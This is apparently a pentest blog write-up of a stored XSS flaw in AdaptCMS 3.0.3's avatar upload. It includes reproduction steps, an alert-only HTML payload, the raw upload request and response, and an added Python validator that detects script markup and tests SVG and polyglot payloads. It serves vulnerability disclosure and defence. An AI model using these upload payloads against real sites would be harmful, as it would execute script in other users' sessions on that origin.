Sunday, 22 June 2025

Friday Fun Pentest Series - 29 - Stored XSS via File Upload - adaptcmsv3.0.3

Description

- It was noted that the avatar upload in the profile editor does not validate the file type. A low-privileged user can upload active content such as HTML or SVG as an avatar; the file is stored under the web root at /adaptcms/uploads/avatars/ with its original extension and is served by Apache as text/html from the application's own origin, so any user who opens the stored URL executes the attacker's script in the context of the AdaptCMS site (Stored XSS).


Stored XSS via File Upload #1:

Steps to Reproduce:

  1. Log in as a low-privileged user and visit "Profile" > "Edit Your Profile" > "Avatar"
  2. Click on "Choose File", select the HTML file below and save the profile
  3. Open the stored file URL returned in the response (/adaptcms/uploads/avatars/1_html-xss.html) directly in the browser; because the upload keeps its .html extension and Apache serves it as text/html, the page renders in the application's origin and the alert fires. Note that the file is only referenced from an <img> tag on the profile page, so the script does not run there; it runs when the stored URL itself is visited (for example via a link sent to another user).


html-xss.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Alert Box Example</title>
    <script>
        // This function will be called when the page loads
        function showAlert() {
            alert("Hello! This is an alert box.");
        }
    </script>
</head>
<body onload="showAlert()">
    <h1>Welcome to the Alert Box Example</h1>
    <p>This page will show an alert box when loaded.</p>
</body>
</html>


// HTTP POST request uploading the XSS file

POST /adaptcms/users/edit HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]

[...]
------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4
Content-Disposition: form-data; name="data[User][settings][avatar]"; filename="html-xss.html"
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Alert Box Example</title>
    <script>
        // This function will be called when the page loads
        function showAlert() {
            alert("Hello! This is an alert box.");
        }
    </script>
</head>
<body onload="showAlert()">
    <h1>Welcome to the Alert Box Example</h1>
    <p>This page will show an alert box when loaded.</p>
</body>
</html>
------geckoformboundary5d089e6e18a0e8706d92f371cd6484c4
Content-Disposition: form-data; name="data[_Token][fields]"


// HTTP Response

HTTP/1.1 200 OK
Date: Fri, 30 May 2025 20:15:54 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Content-Length: 15400
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

[...]
<img src="/adaptcms/uploads/avatars/1_html-xss.html" class="thumbnail col-lg-2" alt="" /> <input type="hidden" name="data[User][settings][old_avatar]" value="1_html-xss.html" id="UserSettingsOldAvatar"/>     <div class="clearfix"></div>
[...]
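The missing control is a server-side check that the avatar is really an image and that the stored copy can never be rendered as active content. The following is an added example (not code from the original post or from AdaptCMS, which is a PHP application) showing the checks that would have rejected html-xss.html: an extension allow-list, magic-byte verification so that the content must match the claimed type, a scan for HTML/SVG markup to catch polyglots, a random server-chosen filename, and the response headers the uploads directory should be served with. The sample inputs, including the HTML payload from the post, are constructed inline; the function names are assumptions made for this example.

```python
import os
import re
import secrets

# Magic bytes of the only image types an avatar upload should accept.
# Extension -> required file prefix.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
ALLOWED_EXT = set(MAGIC)

# Markup a browser would render as active content if the bytes were ever served
# as text/html or image/svg+xml from the application's origin. Checked even on
# files that pass the magic-byte test, to reject image/HTML polyglots.
ACTIVE_CONTENT = re.compile(
    rb"<\s*(!doctype\s+html|html|script|svg|iframe|object|embed|body)\b"
    rb"|\bon\w+\s*=",
    re.IGNORECASE,
)


def classify_upload(filename: str, data: bytes):
    """Return (accepted, reason) for an avatar upload of `filename` with body `data`."""
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext not in ALLOWED_EXT:
        return False, f"extension '.{ext}' is not an allowed image type"
    if not data.startswith(MAGIC[ext]):
        return False, f"content does not match the {ext} magic bytes"
    if ACTIVE_CONTENT.search(data):
        return False, "active content markup found inside the file"
    return True, "ok"


def stored_name(filename: str) -> str:
    """Server-chosen name: random token plus the (already validated) extension.

    The user-supplied name never reaches the filesystem, so neither the original
    basename nor a double extension like 'avatar.html.png' can influence how the
    web server later decides to serve the file.
    """
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    return f"{secrets.token_hex(16)}.{ext}"


def upload_response_headers(name: str) -> dict:
    """Headers for serving anything from the uploads directory.

    nosniff stops content sniffing, the image content type is fixed from the
    validated extension rather than the upload, and a restrictive CSP keeps
    script from running even if a file does get interpreted as a document.
    """
    ext = name.rsplit(".", 1)[-1]
    content_type = {"png": "image/png", "jpg": "image/jpeg",
                    "jpeg": "image/jpeg", "gif": "image/gif"}[ext]
    return {
        "Content-Type": content_type,
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{name}"',
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


# Constructed sample inputs for a stand-alone run.
HTML_PAYLOAD = (b"<!DOCTYPE html>\n<html lang=\"en\">\n<head><script>"
                b"function showAlert(){alert('Hello! This is an alert box.');}"
                b"</script></head>\n<body onload=\"showAlert()\"></body></html>\n")
SVG_PAYLOAD = b"<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>"
TINY_PNG = MAGIC["png"] + b"\x00\x00\x00\rIHDR\x00\x00\x00\x01\x00\x00\x00\x01"
POLYGLOT_PNG = TINY_PNG + b"<script>alert(1)</script>"

if __name__ == "__main__":
    for name, body in [("html-xss.html", HTML_PAYLOAD), ("avatar.svg", SVG_PAYLOAD),
                       ("html-xss.png", HTML_PAYLOAD), ("avatar.png", TINY_PNG),
                       ("avatar.png", POLYGLOT_PNG)]:
        ok, why = classify_upload(name, body)
        print(f"{name:16} {'ACCEPT' if ok else 'REJECT'}: {why}")
    print(stored_name("avatar.png"), upload_response_headers("x.png"))
```

In a real deployment the accepted image should additionally be decoded and re-encoded (for example with Pillow) so that no attacker-controlled bytes are written to disk at all, and the uploads directory should be served from a separate origin rather than from under /adaptcms/ where it shares cookies and session with the application.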
